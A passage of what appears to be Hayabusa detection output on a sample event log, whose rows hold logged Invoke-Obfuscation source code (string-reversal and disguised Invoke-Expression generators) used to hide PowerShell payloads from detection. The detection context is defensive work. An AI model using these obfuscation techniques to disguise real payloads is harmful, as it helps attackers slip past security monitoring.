@(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. 
$RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. 
$RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.250 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. 
$JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. 
$ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. 
If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) 
+ "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. 
$SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.250 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' 
+ ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. 
$RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' 